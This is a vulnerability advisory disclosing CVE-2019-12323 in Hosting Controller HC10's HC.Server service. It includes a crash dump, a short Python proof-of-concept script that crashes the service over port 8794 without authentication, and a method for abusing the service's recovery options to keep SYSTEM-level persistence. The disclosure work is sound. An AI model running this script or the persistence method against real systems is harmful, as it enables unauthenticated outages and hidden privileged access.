[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt [+] ISR: ApparitionSec [Vendor] www.hostingcontroller.com [Product] HC10 HC.Server Service 10.14 HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers simultaneously as part of a single cluster. HC works on an N-tier user model. [Vulnerability Type] Remote Invalid Pointer Write [CVE Reference] CVE-2019-12323 [Security Issue] The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794. In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved. If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence. Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program. The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService". Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10. SERVICE_NAME: HCServerService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HC Server Service DEPENDENCIES : HCProvisioningService SERVICE_START_NAME : LocalSystem Crash Dump: INVALID_POINTER_WRITE_EXPLOITABLE CONTEXT: (.ecxr) rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000 rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000 rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000 r8=000000000000001f r9=00000000000006fe r10=0000000000000603 r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 HC_Server+0x25b6c: 00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=?? Resetting default scope FAULTING_IP: HC_Server+25b6c 00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000001 Parameter[1]: 000000000119033d Attempt to write to address 000000000119033d PROCESS_NAME: HC.Server.exe [Exploit/POC] 1) Configure the HCServiceService recovery failure options to an arbitrary program. 2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges. from socket import * IP = raw_input("[+] HC Server Service IP ") PORT = 8794 payload = "A"*4000 s=socket(AF_INET,SOCK_STREAM) s.connect((IP, PORT)) s.send(payload) s.close() print "Triggering HC10 Server Service Xploit" print "hyp3rlinx" [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: May 14, 2019 No reply Second notification: May 21, 2019 Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019 mitre assign CVE: May 27, 2019 Vendor : "New installer to be released June 13, 2019" June 16, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx